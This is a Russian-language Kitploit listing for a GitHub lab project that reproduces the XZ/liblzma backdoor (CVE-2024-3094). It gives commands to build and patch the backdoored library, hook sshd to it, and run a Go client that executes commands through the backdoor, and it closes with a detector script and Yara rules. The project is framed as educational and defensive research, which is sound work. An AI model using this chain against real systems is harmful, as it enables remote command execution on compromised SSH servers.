Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-3094 — Уязвимость бэкдора в XZ, подробно объясненная | Kitploit
Инструменты/GitHubGitHub/valeriot30/cve-2024-3094
Анализ уязвимостейЭксплуатацияАнализ вредоносных программАнализ Бинарных ФайловОбучение и ОбразованиеЛаборатории и Практика
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

Уязвимость бэкдора в XZ, подробно объясненная

Репозиторий
1131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Кибербезопасность: анализ бэкдора XZ в liblzma

📄 Обзор

Этот проект анализирует громкий бэкдор, обнаруженный в xz-utils (liblzma), затрагивающий версии 5.6.0 и 5.6.1. Вредоносный код, внедрённый в систему сборки upstream, нацеливался на аутентификацию SSH, изменяя то, как sshd взаимодействует с библиотекой сжатия LZMA во время выполнения.

⚠️ Этот проект предназначен только для образовательных и защитных исследований.

Уязвимая машина

Клонируйте этот репозиторий

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Перейдите в директорию

root@kitploit:~
cd cve-2024-3094

Запустите Docker-контейнер

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

Получите вредоносную версию библиотеки

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # Уязвимая версия (также работает с 5.6.1)  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

Экспортируйте цель сборки

root@kitploit:~
export RPM_ARCH=$(uname -m)

Скомпилируйте вредоносную библиотеку

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

Скопируйте вредоносный SO-файл наружу:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

Снова клонируйте репозиторий внутри контейнера

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Пропатчите библиотеку liblzma пользовательским ключом

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

Подключите вредоносную библиотеку в системе

root@kitploit:~
 sh cve-2024-3094/inject.sh

Запустите sshd, связанный с вредоносной библиотекой

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

Машина атакующего

Клонируйте этот репозиторий

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Перейдите в директорию

root@kitploit:~
cd cve-2024-3094

Скомпилируйте GO-инструмент

root@kitploit:~
go build

Используйте инструмент, указав IP-адрес уязвимой машины и команду для выполнения

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

Контрмеры

Использование детектора

Запустите детектор

root@kitploit:~
sh detector.sh

Использование Yara

Используйте правила Yara

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s
Скачать инструмент